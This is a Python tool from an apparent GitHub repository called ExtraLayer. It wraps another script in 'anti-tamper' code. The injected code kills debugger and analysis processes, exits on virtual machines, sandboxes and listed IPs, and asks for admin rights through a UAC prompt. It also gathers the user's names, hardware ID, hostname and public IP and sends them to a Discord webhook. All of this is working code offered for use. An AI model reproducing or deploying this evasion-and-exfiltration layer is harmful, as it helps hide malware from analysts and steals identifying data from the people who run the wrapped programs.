-
Notifications
You must be signed in to change notification settings - Fork 3
/
ExtraLayerMain.py
461 lines (395 loc) · 21.8 KB
/
ExtraLayerMain.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
# // Updated made it semi-automatic.
# // People got confused on how to use this, sooo made it easier.
# // Created by `pingulovesu`
# // ExtraLayer | An extra-layer between you and the code.
# // ExtraLayer | Should be used along with a obfuscator!
# // EL-Imports
import os
try:
os.system('cls')
os.system('title ExtraLayer @ github.com/ImInTheICU/ExtraLayer')
except:
print('[EL-Error] Not supported!')
os._exit(0)
# // EL-Defualts
UseExitReason = False
UseDiscordWebhook = False
UseDebugInfo = False
print("""
________ __ __
/ | / | / |
$$$$$$$$/ __ __ _$$ |_ ______ ______ $$ | ______ __ __ ______ ______
$$ |__ / \ / |/ $$ | / \ / \ $$ | / \ / | / | / \ / \
$$ | $$ \/$$/ $$$$$$/ /$$$$$$ |$$$$$$ |$$ | $$$$$$ |$$ | $$ |/$$$$$$ |/$$$$$$ |
$$$$$/ $$ $$< $$ | __ $$ | $$/ / $$ |$$ | / $$ |$$ | $$ |$$ $$ |$$ | $$/
$$ |_____ /$$$$ \ $$ |/ |$$ | /$$$$$$$ |$$ |_____ /$$$$$$$ |$$ \__$$ |$$$$$$$$/ $$ |
$$ |/$$/ $$ | $$ $$/ $$ | $$ $$ |$$ |$$ $$ |$$ $$ |$$ |$$ |
$$$$$$$$/ $$/ $$/ $$$$/ $$/ $$$$$$$/ $$$$$$$$/ $$$$$$$/ $$$$$$$ | $$$$$$$/ $$/
/ \__$$ |
$$ $$/
$$$$$$/
Made by BugleBoy#1234
Star on Github : >
V.0.4 - HotFix:
- HF (Fixed ELSelect3 - Webhook)
+ Added a CLI to help people add ExtraLayer
+ Fixed some modules
+ Fixed JunkCode
""")
while True:
FileName = str(input("[EL-Select] FileName (Drag File Here/Enter File Name) -: "))
if not os.path.exists(FileName):
print("\n[EL-Error] That file does not exist :<")
else:
break
print("\n[EL-Info] Please select you're config using Yes/No(Y/N).\
\n\t*User see's exit-reason \n\t\tIf the user will see the reason the program denied access to them.\
\n\t*User see's debug info \n\t\tIf the user will see error's / program problems.\
\n\t*Log debug/deobfuscation attempts to webhook \n\t\tIf the user's info will be logged if deobfuscation is attempted.")
ELSelect1 = str(input("\n\n[EL-Select] User see's exit-reason (Yes/No) -: "))
ELSelect2 = str(input("[EL-Select] User see's debug info (Yes/No) -: "))
ELSelect3 = str(input("[EL-Select] Log debug/deobfuscation attempts to webhook (Yes/No) -: "))
if ELSelect1.lower() in ('yes','y'): UseExitReason = True
elif ELSelect1.lower() in ('no','n'): UseExitReason = False
else: print("\n[EL-Error] You dident select (Yes/No), so I defualted it to 'yes'"); UseExitReason = True
if ELSelect2.lower() in ('yes','y'): UseDebugInfo = True
elif ELSelect2.lower() in ('no','n'): UseDebugInfo = False
else: print("\n[EL-Error] You dident select (Yes/No), so I defualted it to 'no'"); UseDebugInfo = False
if ELSelect3.lower() in ('yes','y'):
UseDiscordWebhook = True
ELSelect3_WebHook = str(input("[EL-Select] Enter you're discord webhook -: "))
elif ELSelect3.lower() in ('no','n'): UseDiscordWebhook = False
else: print("\n[EL-Error] You dident select (Yes/No), so I defualted it to 'no'"); UseDiscordWebhook = False
# // Write new code, this is kinda a nut-shell but like...
PrewrittenModule = '''
# // Imports
import os
import math
import ctypes
import random
import json
import socket
import subprocess
import sys
import uuid
import hashlib
import time
from threading import Thread
from requests import get, post
from os import system, path, environ
from win32gui import GetWindowText,EnumWindows
from win32process import GetWindowThreadProcessId
from psutil import Process,process_iter, virtual_memory, cpu_count, disk_usage, users
from winreg import HKEY_LOCAL_MACHINE, OpenKey, CloseKey, QueryValueEx
# // Secondary Class for logging.
class Discord:
def __init__(self, *, url):
self.url = url
def post(
self,
*,
content=None,
username=None,
avatar_url=None,
tts=False,
file=None,
embeds=None,
allowed_mentions=None
):
if content is None and file is None and embeds is None:
raise ValueError("required one of content, file, embeds")
data = {}
if content is not None:
data["content"] = content
if username is not None:
data["username"] = username
if avatar_url is not None:
data["avatar_url"] = avatar_url
data["tts"] = tts
if embeds is not None:
data["embeds"] = embeds
if allowed_mentions is not None:
data["allowed_mentions"] = allowed_mentions
if file is not None:
return post(
self.url, {"payload_json": json.dumps(data)}, files=file
)
else:
return post(
self.url, json.dumps(data), headers={"Content-Type": "application/json"}
)
'''+'''
# // Main Class
class ExtraLayer:
# // Settings
LAYER_SEND_REASON = {LSendReason} # // Send the reason of exiting | might help them debug... so use at cation!
LAYER_SEND_INFO = {LSendInfo} # // Send debug info, of user | might help you debug if ExtraLayer is causing problems!
LAYER_DISCORD_WEBHOOK = "{LDiscordWebhook}"
'''.format(LSendReason=UseExitReason,LSendInfo=UseDebugInfo,LDiscordWebhook="" if UseDiscordWebhook == False else ELSelect3_WebHook)+r'''
# // Extras
self_file = path.basename(sys.argv[0]) # // The name of the file (in-case it gets re-named)
if LAYER_DISCORD_WEBHOOK != "":
try:
UserWebHook = Discord(url=str(LAYER_DISCORD_WEBHOOK))
except Exception as errored:
if LAYER_SEND_INFO:
print(f"DEBUG: Could not assign WebHook! | {errored}")
# // Error Reasons (Change at risk)
LAYER_REASONS = {
"_CHECK_WINDOWS":["Found Debugger, Type: {debugger}"],
"_CHECK_IP":["Blacklisted IP!"],
"_CHECK_VM":["Detected VM(VPS) 0x1"],
"_CHECK_REGISTRY":["Detected VM(VPS) 0x2"],
"_CHECK_DLL":["Detected VM(VPS) 0x3"],
"_CHECK_SPECS":["MEMORY Invalid!","STORAGE Invalid!","CPU Counts, invalid!"],
"_JUNK_CODE":[f"{self_file} WAS CHANGED!"],
"_PROXIED_CONNECTION":["ConnectionTest failed, using proxied connection! \nProxy: {usingproxy} \nType: {proxytype}"],
"_CONNECTION_TEST":["ConnectionTest failed, try re-connecting to WiFi!"],
"_ERRORED":["[Core] ExtraLayer has reported a fatal-error! \nReport at: `https://github.com/ImInTheICU/Python-AntiTamper` \nERROR: {error}"],
}
# // Methods
def _EXIT(reason):
if ExtraLayer.LAYER_SEND_REASON:
print(reason)
if ExtraLayer.LAYER_SEND_INFO:
print("DEBUG: _EXIT")
if ExtraLayer.UserWebHook:
try:
# // Gets All USERS, Bad method of appending (please update), thanks!
USERS = """"""
PC_USERS = users()
for PC_USER in PC_USERS:
USERS += f"{PC_USER.name} | "
# // Get HWID/UUID
USER_HWID = str(subprocess.check_output('wmic csproduct get uuid')).split('\\r\\n')[1].strip('\\r').strip()
# // Get IP
USER_IP = get('https://api64.ipify.org/').text.strip()
# // Get HostName (Running User).
if socket.gethostname().find('.')>=0:
USER = socket.gethostname()
else:
USER = socket.gethostbyaddr(socket.gethostname())[0]
ExtraLayer.UserWebHook.post(
username="ExtraLayer Services",
avatar_url="https://raw.githubusercontent.com/ImInTheICU/Python-AntiTamper/main/_ExtraLayer128x128.jpg",
embeds=[
{
"author": {
"name": "Anti-Debugger",
"url": "https://github.com/ImInTheICU/Python-AntiTamper",
},
"title": "PC INFO",
"description": "**Warning: Sensitive information, DONT SHARE OR LEAK!**",
"fields": [
{"name": "PC INFO", "value": f"```\nPC Name: {USER} \nPC's: {USERS} \nPC-HWID: {USER_HWID} \nIP: {USER_IP} \n```"},
{"name": "Detection", "value": f"```\nExtraLayer Detected: {reason} \n```"},
],
"footer": {
"text": "Protected by ExtraLayer!",
},
}
],
)
except Exception as errored:
ExtraLayer._EXIT(ExtraLayer.LAYER_REASONS["_ERRORED"][0].format(error = errored))
exec(type((lambda: 0).__code__)(0, 0, 0, 0, 0, 0, b'\x053', (), (), (), '', '', 0, b''))
def _CHECK_WINDOWS():
if ExtraLayer.LAYER_SEND_INFO:
print("DEBUG: _CHECK_WINDOWS")
def winEnumHandler( hwnd, ctx ):
if GetWindowText( hwnd ).lower() in {'proxifier', 'graywolf', 'extremedumper', 'zed', 'exeinfope', 'dnspy', 'titanHide', 'ilspy', 'titanhide', 'x32dbg', 'codecracker', 'simpleassembly', 'process hacker 2', 'pc-ret', 'http debugger', 'Centos', 'process monitor', 'debug', 'ILSpy', 'reverse', 'simpleassemblyexplorer', 'process', 'de4dotmodded', 'dojandqwklndoqwd-x86', 'sharpod', 'folderchangesview', 'fiddler', 'die', 'pizza', 'crack', 'strongod', 'ida -', 'brute', 'dump', 'StringDecryptor', 'wireshark', 'debugger', 'httpdebugger', 'gdb', 'kdb', 'x64_dbg', 'windbg', 'x64netdumper', 'petools', 'scyllahide', 'megadumper', 'reversal', 'ksdumper v1.1 - by equifox', 'dbgclr', 'HxD', 'monitor', 'peek', 'ollydbg', 'ksdumper', 'http', 'wpe pro', 'dbg', 'httpanalyzer', 'httpdebug', 'PhantOm', 'kgdb', 'james', 'x32_dbg', 'proxy', 'phantom', 'mdbg', 'WPE PRO', 'system explorer', 'de4dot', 'x64dbg', 'X64NetDumper', 'protection_id', 'charles', 'systemexplorer', 'pepper', 'hxd', 'procmon64', 'MegaDumper', 'ghidra', 'xd', '0harmony', 'dojandqwklndoqwd', 'hacker', 'process hacker', 'SAE', 'mdb', 'checker', 'harmony', 'Protection_ID', 'PETools', 'scyllaHide', 'x96dbg', 'systemexplorerservice', 'folder', 'mitmproxy', 'dbx', 'sniffer', 'http toolkit', 'ProcessHacker.exe'}:
pid = GetWindowThreadProcessId(hwnd)
if type(pid) == int:
try: Process(pid).terminate()
except: pass
else:
for process in pid:
try: Process(process).terminate()
except: pass
if ExtraLayer.LAYER_SEND_INFO:
print("DEBUG: _CHECK_WINDOWS | Failed")
ExtraLayer._EXIT(ExtraLayer.LAYER_REASONS["_CHECK_WINDOWS"][0].format(debugger = {GetWindowText( hwnd )}))
while True: EnumWindows( winEnumHandler, None )
def _CHECK_IP():
if ExtraLayer.LAYER_SEND_INFO:
print("DEBUG: _CHECK_IP")
blacklisted = {'88.132.227.238', '79.104.209.33', '92.211.52.62', '20.99.160.173', '188.105.91.173', '64.124.12.162', '195.181.175.105', '194.154.78.160', '', '109.74.154.92', '88.153.199.169', '34.145.195.58', '178.239.165.70', '88.132.231.71', '34.105.183.68', '195.74.76.222', '192.87.28.103', '34.141.245.25', '35.199.6.13', '34.145.89.174', '34.141.146.114', '95.25.204.90', '87.166.50.213', '193.225.193.201', '92.211.55.199', '35.229.69.227', '104.18.12.38', '88.132.225.100', '213.33.142.50', '195.239.51.59', '34.85.243.241', '35.237.47.12', '34.138.96.23', '193.128.114.45', '109.145.173.169', '188.105.91.116', 'None', '80.211.0.97', '84.147.62.12', '78.139.8.50', '109.74.154.90', '34.83.46.130', '212.119.227.167', '92.211.109.160', '93.216.75.209', '34.105.72.241', '212.119.227.151', '109.74.154.91', '95.25.81.24', '188.105.91.143', '192.211.110.74', '34.142.74.220', '35.192.93.107', '88.132.226.203', '34.85.253.170', '34.105.0.27', '195.239.51.3', '192.40.57.234', '92.211.192.144', '23.128.248.46', '84.147.54.113', '34.253.248.228',None}
while True:
try:
ip = get('https://api64.ipify.org/').text.strip()
if ip in blacklisted: ExtraLayer._EXIT(ExtraLayer.LAYER_REASONS["_CHECK_IP"][0])
return
except: pass
def _CHECK_VM():
if ExtraLayer.LAYER_SEND_INFO:
print("DEBUG: _CHECK_VM")
processes = ['VMwareService.exe', 'VMwareTray.exe']
for proc in process_iter():
if proc.name() in processes: ExtraLayer._EXIT(ExtraLayer.LAYER_REASONS["_CHECK_VM"][0])
def _CHECK_REGISTRY():
if ExtraLayer.LAYER_SEND_INFO:
print("DEBUG: _CHECK_REGISTRY")
if system("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\DriverDesc 2> nul") != 1 and system("REG QUERY HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Class\\{4D36E968-E325-11CE-BFC1-08002BE10318}\\0000\\ProviderName 2> nul") != 1: ExtraLayer._EXIT('Detected Vm')
handle = OpenKey(HKEY_LOCAL_MACHINE, 'SYSTEM\\CurrentControlSet\\Services\\Disk\\Enum')
try:
if "VMware" in QueryValueEx(handle, '0')[0] or "VBOX" in QueryValueEx(handle, '0')[0]: ExtraLayer._EXIT(ExtraLayer.LAYER_REASONS["_CHECK_REGISTRY"][0])
finally: CloseKey(handle)
def _CHECK_DLL():
if ExtraLayer.LAYER_SEND_INFO:
print("DEBUG: _CHECK_DLL")
if path.exists(path.join(environ["SystemRoot"], "System32\\vmGuestLib.dll")) or path.exists(path.join(environ["SystemRoot"], "vboxmrxnp.dll")): ExtraLayer._EXIT(ExtraLayer.LAYER_REASONS["_CHECK_DLL"][0])
def _CHECK_SPECS():
if ExtraLayer.LAYER_SEND_INFO:
print("DEBUG: _CHECK_SPECS")
if int(str(virtual_memory()[0]/1024/1024/1024).split(".")[0]) <= 4: ExtraLayer._EXIT(ExtraLayer.LAYER_REASONS["_CHECK_SPECS"][0])
if int(str(disk_usage('/')[0]/1024/1024/1024).split(".")[0]) <= 50: ExtraLayer._EXIT(ExtraLayer.LAYER_REASONS["_CHECK_SPECS"][1])
if int(cpu_count()) <= 1: ExtraLayer._EXIT(ExtraLayer.LAYER_REASONS["_CHECK_SPECS"][2])
# // Get CHECKSUM
def _GET_CHECKSUM():
md5_hash = hashlib.md5()
file = open(''.join(sys.argv), "rb")
md5_hash.update(file.read())
digest = md5_hash.hexdigest()
if ExtraLayer.LAYER_SEND_INFO:
print(f"DEBUG: _GET_CHECKSUM | {digest}")
return digest
# // Remove Junk
def _RM_JUNK(JunkCode:str):
try:
with open(os.getcwd()+ExtraLayer.self_file, "r+") as text_file:
texts = text_file.read()
texts = texts.replace(JunkCode, "")
with open(os.getcwd()+ExtraLayer.self_file, "w") as text_file:
text_file.write(texts)
return ExtraLayer._GET_CHECKSUM()
except Exception as errored:
ExtraLayer._EXIT(ExtraLayer.LAYER_REASONS["_ERRORED"][0].format(error = errored))
# // Add Junk
def _ADD_JUNK():
with open(os.getcwd()+ExtraLayer.self_file, 'a+') as PythonFile:
JUNK_ID = uuid.uuid4().hex
JUNK_ID2 = uuid.uuid4().hex
# // Randomize even more!
Headers = (
f'def _{JUNK_ID}_():',
f'class _{JUNK_ID}_():',
)
# // Random Spam
Bodies = (
f'= exec(print("{JUNK_ID}"))',
f'= exec(math.ceil({random.randint(1,1000)}) * math.exp({random.randint(1,1000)}))',
f'= exec(str("{ExtraLayer.self_file}") + str("_FILE"))',
f'= exec(math.floor({random.randint(1,1000)} / math.ceil({random.randint(1,5000)})))',
f'= exec({math.hypot(1.0, 100.0)} - {random.randint(303,30482)})',
f'= exec(print("Protected by ExtraLayer | Github"))',
f'= exec(print("L + Ratio | Check out Hyperion!"))'
)
# // Allow's to return the VAR (for calling it) or the Joint (for defining it)
def _QUICK_CALL_JUNKCODE(type:bool):
BodieName = f"Execute_{random.randint(1,100)}"
if type == True:
return BodieName
elif type == False:
BodieJoint = f"{BodieName} {random.choice(Bodies)}"
return BodieJoint
# // Everything in 'JunkCode' is pear junk, dw about it
JunkCode = f"""
# ; ) dont worry about this
{random.choice(Headers)}
def _{JUNK_ID}_():
{_QUICK_CALL_JUNKCODE(False)}
{_QUICK_CALL_JUNKCODE(False)}
{_QUICK_CALL_JUNKCODE(False)}
{_QUICK_CALL_JUNKCODE(False)}
{_QUICK_CALL_JUNKCODE(True)}() # Call Protection!
_{JUNK_ID}_() # Call Functions for byte334 code!
def _{JUNK_ID}_():
{_QUICK_CALL_JUNKCODE(False)}
{_QUICK_CALL_JUNKCODE(False)}
{_QUICK_CALL_JUNKCODE(False)}
{_QUICK_CALL_JUNKCODE(False)}
{_QUICK_CALL_JUNKCODE(True)}() # Call Protection!
_{JUNK_ID}_() # Call Functions for byte2 code!
# call p2p class (bro api)
class _{JUNK_ID2}_():
def _{JUNK_ID}_():
{_QUICK_CALL_JUNKCODE(False)}
{_QUICK_CALL_JUNKCODE(False)}
{_QUICK_CALL_JUNKCODE(False)}
{_QUICK_CALL_JUNKCODE(False)}
{_QUICK_CALL_JUNKCODE(True)}() # Call Protection!
returns = _{JUNK_ID2}_() # just incase byte code fails ; )
print(returns)
"""
# // Write junk-code to self_file
PythonFile.write(f"{JunkCode}")
# // Returning junk-code, for removal
return JunkCode
def _JUNK_CODE():
while True:
CheckSum = ExtraLayer._GET_CHECKSUM()
JunkCode = ExtraLayer._ADD_JUNK() # // ADD JUNK CODE (Returns the junk-code)
if ExtraLayer.LAYER_SEND_INFO and JunkCode:
print("DEBUG: Added Junk")
time.sleep(1)
RM_CHECK = ExtraLayer._RM_JUNK(JunkCode=JunkCode) # // REMOVE JUNK CODE (Takes junk-code as a input)
if ExtraLayer.LAYER_SEND_INFO and RM_CHECK:
print("DEBUG: Removed Junk")
NewCheckSum = ExtraLayer._GET_CHECKSUM()
if CheckSum == NewCheckSum:
time.sleep(0.5) # // Waiting,
else:
ExtraLayer._EXIT(f'{ExtraLayer.LAYER_REASONS["_JUNK_CODE"][0]}') # // Hard-Exit (On-Changes)
def _CONNECTION_TEST():
while True:
try:
connection_ip = get('https://api64.ipify.org/').text.strip()
proxy_callback = get(f"https://proxycheck.io/v2/{connection_ip}?vpn=1").json()
if "ok" in proxy_callback['status']:
if "yes" in proxy_callback[connection_ip]['proxy']:
ExtraLayer._EXIT(ExtraLayer.LAYER_REASONS["_PROXIED_CONNECTION"][0].format(usingproxy = proxy_callback[connection_ip]['proxy'], proxytype = proxy_callback[connection_ip]['type']))
except Exception as errored:
ExtraLayer._EXIT(ExtraLayer.LAYER_REASONS["_ERRORED"][0].format(error = errored))
time.sleep(5)
def _UAC():
ctypes.windll.shell32.IsUserAnAdmin() or (ctypes.windll.shell32.ShellExecuteW(None, "runas", sys.executable, " ".join(sys.argv), None, 1) > 32, exit())
# // Main | Startup
def _START_LAYER():
# // Doing Platform checks...
if sys.platform.startswith("linux") or sys.platform == "darwin":
ExtraLayer._EXIT(ExtraLayer.LAYER_REASONS["_ERRORED"][0].format(error = "Don't report this | PLATFORM IS NOT SUPPORTED (WINDOWS REQUIRED)!"))
if ExtraLayer.LAYER_SEND_INFO:
print("DEBUG: Start_Layer was called!")
checks = (
ExtraLayer._CHECK_WINDOWS,
ExtraLayer._CHECK_IP,
ExtraLayer._CHECK_REGISTRY,
ExtraLayer._CHECK_DLL,
ExtraLayer._CHECK_SPECS,
ExtraLayer._CHECK_VM,
ExtraLayer._JUNK_CODE,
ExtraLayer._CONNECTION_TEST,
ExtraLayer._UAC
) # // You can add,remove checks here!
# // Run in UAC thread...
if ExtraLayer._UAC in checks:
if ExtraLayer.LAYER_SEND_INFO:
print(f"DEBUG: UAC was started in a new thread!")
ExtraLayer._UAC()
for check in checks: Thread(target=check,daemon=True).start() # // Start all layers, enabled
if ExtraLayer.LAYER_SEND_INFO:
print(f"DEBUG: {check}, was started!")
ExtraLayer._START_LAYER() # // Startup
'''+f'''
{open(FileName).read()}
''' # // Write Orgin
# // Write final code
with open(FileName[:-3]+'_EL.py','w+') as FP:
FP.write(PrewrittenModule)
print(f"[EL-Info] Saved protected to: '{FileName[:-3]+'_EL.py'}'")
print("\n\n[EL-Info] Thanks for using ExtraLayer! \
\n\t*You can change the module/checks used near 'def _START_LAYER():' \
\n\tIf you enjoyed my tool maybe star it on Github? \
\n\tIf you need to contact me my Discord is BugleBoy#1234")
input('\n\n\tPress anything to exit!')
os._exit(0)